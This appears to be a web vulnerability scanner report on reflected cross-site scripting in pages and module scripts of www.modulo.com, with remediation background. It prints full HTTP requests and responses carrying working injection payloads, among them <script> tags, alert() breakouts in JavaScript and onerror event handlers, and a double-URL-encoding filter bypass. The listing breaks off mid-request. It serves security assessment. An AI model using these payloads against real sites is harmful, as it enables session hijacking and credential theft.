Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.modulo.com/it-grc-articles/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/it-grc-articles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8eab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e90871a7a09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8eab\\\"><script>alert(1)</script>90871a7a09f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /it-grc-articles/?d8eab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e90871a7a09f=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/risk-management-in-government
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01; __utma=202267277.689599910.1330703379.1330703379.1330703379.1; __utmb=202267277.3.10.1330703379; __utmc=202267277; __utmz=202267277.1330703379.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.0 200 OK
Date: Fri, 02 Mar 2012 18:48:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 02 Mar 2012 18:48:21 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

...[SNIP]...
<link href="/articles/feed/rss?d8eab\\\"><script>alert(1)</script>90871a7a09f=1&format=feed" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

1.2. http://www.modulo.com/modules/mod_gk_news_highlighter/scripts/importer.php [animation_fun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/scripts/importer.php

Issue detail

The value of the animation_fun request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c7c4a%3balert(1)//09f35d165bb was submitted in the animation_fun parameter. This input was echoed as c7c4a;alert(1)//09f35d165bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=250&animation_interval=5000&animation_fun=Fx.Transitions.linearc7c4a%3balert(1)//09f35d165bb&mouseover=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:32 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 259
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_highlighternews-highlight-1"] = {
       "animationType" : 1,
       "animationSpeed" : 250,
       "animationInterval" : 5000,
       "animationFun" : Fx.Transitions.linearc7c4a;alert(1)//09f35d165bb,
       "mouseover" : 1};

1.3. http://www.modulo.com/modules/mod_gk_news_highlighter/scripts/importer.php [animation_interval parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/scripts/importer.php

Issue detail

The value of the animation_interval request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7f84c%3balert(1)//a46eea25777 was submitted in the animation_interval parameter. This input was echoed as 7f84c;alert(1)//a46eea25777 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=250&animation_interval=50007f84c%3balert(1)//a46eea25777&animation_fun=Fx.Transitions.linear&mouseover=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:30 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 259
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_highlighternews-highlight-1"] = {
       "animationType" : 1,
       "animationSpeed" : 250,
       "animationInterval" : 50007f84c;alert(1)//a46eea25777,
       "animationFun" : Fx.Transitions.linear,
       "mouseover" : 1};

1.4. http://www.modulo.com/modules/mod_gk_news_highlighter/scripts/importer.php [animation_speed parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/scripts/importer.php

Issue detail

The value of the animation_speed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2a396%3balert(1)//27c051a6c8f was submitted in the animation_speed parameter. This input was echoed as 2a396;alert(1)//27c051a6c8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=2502a396%3balert(1)//27c051a6c8f&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:28 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 259
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_highlighternews-highlight-1"] = {
       "animationType" : 1,
       "animationSpeed" : 2502a396;alert(1)//27c051a6c8f,
       "animationInterval" : 5000,
       "animationFun" : Fx.Transitions.linear,
       "mouseover" : 1};

1.5. http://www.modulo.com/modules/mod_gk_news_highlighter/scripts/importer.php [animation_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/scripts/importer.php

Issue detail

The value of the animation_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74a03%3balert(1)//55fe1c72c3b was submitted in the animation_type parameter. This input was echoed as 74a03;alert(1)//55fe1c72c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=174a03%3balert(1)//55fe1c72c3b&animation_speed=250&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:26 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 259
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_highlighternews-highlight-1"] = {
       "animationType" : 174a03;alert(1)//55fe1c72c3b,
       "animationSpeed" : 250,
       "animationInterval" : 5000,
       "animationFun" : Fx.Transitions.linear,
       "mouseover" : 1};

1.6. http://www.modulo.com/modules/mod_gk_news_highlighter/scripts/importer.php [mouseover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/scripts/importer.php

Issue detail

The value of the mouseover request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e71d3%3balert(1)//6c3940635ed was submitted in the mouseover parameter. This input was echoed as e71d3;alert(1)//6c3940635ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=250&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1e71d3%3balert(1)//6c3940635ed HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:34 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 259
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_highlighternews-highlight-1"] = {
       "animationType" : 1,
       "animationSpeed" : 250,
       "animationInterval" : 5000,
       "animationFun" : Fx.Transitions.linear,
       "mouseover" : 1e71d3;alert(1)//6c3940635ed};

1.7. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [bgcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the bgcolor request parameter is copied into the HTML document as plain text between tags. The payload d221f<img%20src%3da%20onerror%3dalert(1)>c6ffab5c5dd was submitted in the bgcolor parameter. This input was echoed as d221f<img src=a onerror=alert(1)>c6ffab5c5dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffffd221f<img%20src%3da%20onerror%3dalert(1)>c6ffab5c5dd&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:09 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2027
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top: 1px solid #ffffff;    border-bottom: 1px solid #ffffff;    background: #ffffffd221f<img src=a onerror=alert(1)>c6ffab5c5dd;    clear: both;
   overflow: hidden;
}

div#news-highlight-1 .gk_news_highlighter_wrapper{
   float: left;
   width: 850px;
   height: 30px;
   line-height: 30px;
   overflow: hidden;
   position: relative;
}

div#ne
...[SNIP]...

1.8. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [bordercolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the bordercolor request parameter is copied into the HTML document as plain text between tags. The payload 6018e<img%20src%3da%20onerror%3dalert(1)>75e187ba5ac was submitted in the bordercolor parameter. This input was echoed as 6018e<img src=a onerror=alert(1)>75e187ba5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff6018e<img%20src%3da%20onerror%3dalert(1)>75e187ba5ac&set=2&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2071
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top: 1px solid #ffffff6018e<img src=a onerror=alert(1)>75e187ba5ac;    border-bottom: 1px solid #ffffff6018e<img src=a onerror=alert(1)>
...[SNIP]...

1.9. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [hlinkcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the hlinkcolor request parameter is copied into the HTML document as plain text between tags. The payload 507b9<img%20src%3da%20onerror%3dalert(1)>2eaf54c7e14 was submitted in the hlinkcolor parameter. This input was echoed as 507b9<img src=a onerror=alert(1)>2eaf54c7e14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=507b9<img%20src%3da%20onerror%3dalert(1)>2eaf54c7e14&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:46 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2036
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top:
...[SNIP]...

}

div#news-highlight-1 a,
div#news-highlight-1 a:link,
div#news-highlight-1 a:visited,
div#news-highlight-1 a:active,
div#news-highlight-1 a:focus {
   }

div#news-highlight-1 a:hover {
   color: #507b9<img src=a onerror=alert(1)>2eaf54c7e14;}

div#news-highlight-1 .gk_news_highlighter_interface a.next {
   float: right;
   background-position: -26px 50%;
}

div#news-highlight-1 .gk_news_highlighter_interface a:hover.next {
   background-po
...[SNIP]...

1.10. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [interfaceWidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the interfaceWidth request parameter is copied into the HTML document as plain text between tags. The payload a9048<img%20src%3da%20onerror%3dalert(1)>43d7e60ceb1 was submitted in the interfaceWidth parameter. This input was echoed as a9048<img src=a onerror=alert(1)>43d7e60ceb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120a9048<img%20src%3da%20onerror%3dalert(1)>43d7e60ceb1&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:00 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2027
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top:
...[SNIP]...
gk_news_highlighter_title{
   padding-left: 5px;
}

div#news-highlight-1 .gk_news_highlighter_desc{
   padding-right: 5px;
}

div#news-highlight-1 .gk_news_highlighter_interface{
   float: left;
   width: 120a9048<img src=a onerror=alert(1)>43d7e60ceb1px;
   height: 30px;
   text-align: right;
   line-height: 30px;
   z-index: 1000;
}

div#news-highlight-1 .gk_news_highlighter_interface .text{
   float: left;
   display: block;
   width: auto;
   padding-le
...[SNIP]...

1.11. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [linkcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the linkcolor request parameter is copied into the HTML document as plain text between tags. The payload 3a038<img%20src%3da%20onerror%3dalert(1)>609185eec25 was submitted in the linkcolor parameter. This input was echoed as 3a038<img src=a onerror=alert(1)>609185eec25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=3a038<img%20src%3da%20onerror%3dalert(1)>609185eec25&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2036
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top:
...[SNIP]...
   background-position: -13px 50%;
}

div#news-highlight-1 a,
div#news-highlight-1 a:link,
div#news-highlight-1 a:visited,
div#news-highlight-1 a:active,
div#news-highlight-1 a:focus {
   color: #3a038<img src=a onerror=alert(1)>609185eec25;}

div#news-highlight-1 a:hover {
   }

div#news-highlight-1 .gk_news_highlighter_interface a.next {
   float: right;
   background-position: -26px 50%;
}

div#news-highlight-1 .gk_news_highlighter_int
...[SNIP]...

1.12. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [moduleHeight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the moduleHeight request parameter is copied into the HTML document as plain text between tags. The payload e8848<img%20src%3da%20onerror%3dalert(1)>b3a58951343 was submitted in the moduleHeight parameter. This input was echoed as e8848<img src=a onerror=alert(1)>b3a58951343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30e8848<img%20src%3da%20onerror%3dalert(1)>b3a58951343&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2291
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30e8848<img src=a onerror=alert(1)>b3a58951343px;
   border-top: 1px solid #ffffff;    border-bottom: 1px solid #ffffff;    background: #ffffff;    clear: both;
   overflow: hidden;
}

div#news-highlight-1 .gk_news_highlighter_wrapper{
   float: left;
   width: 85
...[SNIP]...

1.13. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [moduleWidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the moduleWidth request parameter is copied into the HTML document as plain text between tags. The payload a6b2e<img%20src%3da%20onerror%3dalert(1)>6e5eb297985 was submitted in the moduleWidth parameter. This input was echoed as a6b2e<img src=a onerror=alert(1)>6e5eb297985 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990a6b2e<img%20src%3da%20onerror%3dalert(1)>6e5eb297985&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
